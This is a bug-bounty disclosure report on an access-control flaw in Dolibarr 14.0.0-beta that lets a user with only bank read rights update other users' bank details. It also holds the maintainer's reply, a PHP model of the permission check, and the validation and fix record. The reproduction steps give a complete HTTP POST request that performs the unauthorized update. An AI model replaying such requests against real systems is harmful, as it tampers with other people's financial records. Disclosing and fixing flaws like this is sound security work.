Improper Handling of Insufficient Privileges in dolibarr/dolibarr

Valid

Reported on

May 24th 2021


💥 BUG

An unprivileged user can attach a bank account to another user.

💥 IMPACT

A user who does not have any access to the "Users & Groups" module can update other users' bank details.

💥 TESTED VERSION

dolibarr 14.0.0-beta

💥 STEPS TO REPRODUCE

1. First go to the admin account and add user B as a normal user.
Now give user B the permission below for the Banks and cash module:

---> Read financial accounts

Do not give any permission for the Users & Groups module.

So user B cannot see or update any user's details, and also cannot update users' bank details.

2. Now, from the admin account, go to the HR and Bank tab of any other user by visiting a URL like http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1,
and add bank details there.

3. Finally, go to user B's account and send the request below to update the bank details.

POST /dolibarr-develop/htdocs/user/bank.php?id=1 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:85.0) Gecko/20100101 Firefox/85.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 209
Origin: http://localhost
Connection: close
Referer: http://localhost/dolibarr-develop/htdocs/user/bank.php?id=1&bankid=1&action=edit
Cookie:  DOLSESSID_8e8881ad773ee74880c453666c22c288=kd3isa1fp3c53e419fgn79lilo
Upgrade-Insecure-Requests: 1
ACCOUNT: TEST2

token=$2y$10$wc1M5v3Z56ITbdACetnEPu7M6Nc/xILSazkIEvhhNDwtnC4tTEvr2&action=update&id=1&bankid=1&label=cbbcbbb_by_user&bank=hghgg+by_users&number=&iban=856345255&bic=654555&domiciliation=&proprio=&owner_address=

So user B, who does not have any "Users & Groups" permission and has only read permission on banks, can update another user's bank details.

Laurent
2 months ago

Maintainer


According to the code of v14.0.2, the controller for action=update to update a bank is protected with if ($action == 'update' && !$cancel && $permissiontoaddbankaccount) { so user B should have a write permission among one of the list $permissiontoaddbankaccount = (!empty($user->rights->salaries->write) || !empty($user->rights->hrm->employee->write) || !empty($user->rights->user->creer));

Can you check?
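The guard the maintainer quotes, and the reproduction steps above, as an added illustration that is not Dolibarr's code nor the maintainer's: a minimal model of the user/bank.php permission gate, with the three right names taken from the comment above and the functions, the sample users and the banque->lire right name assumed here.

```php
<?php
// Added illustration, not Dolibarr's code. Models the gate quoted for
// user/bank.php: an update is only performed when the caller holds one of
// the three write rights; "Read financial accounts" alone must not suffice.

function permissionToAddBankAccount(object $user): bool
{
    // Right names as quoted by the maintainer; missing properties read as empty.
    return !empty($user->rights->salaries->write)
        || !empty($user->rights->hrm->employee->write)
        || !empty($user->rights->user->creer);
}

// Hypothetical controller dispatch: returns what the update handler would do.
function handleBankAction(object $user, string $action, bool $cancel): string
{
    if ($action === 'update' && !$cancel) {
        // The guard: no write right, no update (the missing check in the report).
        return permissionToAddBankAccount($user) ? 'updated' : 'forbidden';
    }
    return 'shown';   // any other action only renders the page
}

// Constructed sample: user B from the report, Banks module read-only
// (banque->lire is the assumed name of "Read financial accounts").
$userB = json_decode('{"rights":{"banque":{"lire":1},"salaries":{"write":0},
                                 "hrm":{"employee":{"write":0}},"user":{"creer":0}}}');
// Constructed sample: a user with the Users & Groups "create" right.
$admin = json_decode('{"rights":{"user":{"creer":1}}}');

// The POST from step 3 carries action=update with no cancel parameter.
echo 'user B  : ', handleBankAction($userB, 'update', false), PHP_EOL;
echo 'admin   : ', handleBankAction($admin, 'update', false), PHP_EOL;
echo 'user B  (view only): ', handleBankAction($userB, 'view', false), PHP_EOL;
```

A regression check for the fix can reuse this shape: replay the step-3 request as user B and assert the response does not modify the bank record.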

Laurent Destailleur validated this vulnerability a month ago
ranjit-git has been awarded the disclosure bounty
The fix bounty is now up for grabs
Laurent Destailleur confirmed that a fix has been merged on bb64a2 a month ago
Laurent Destailleur has been awarded the fix bounty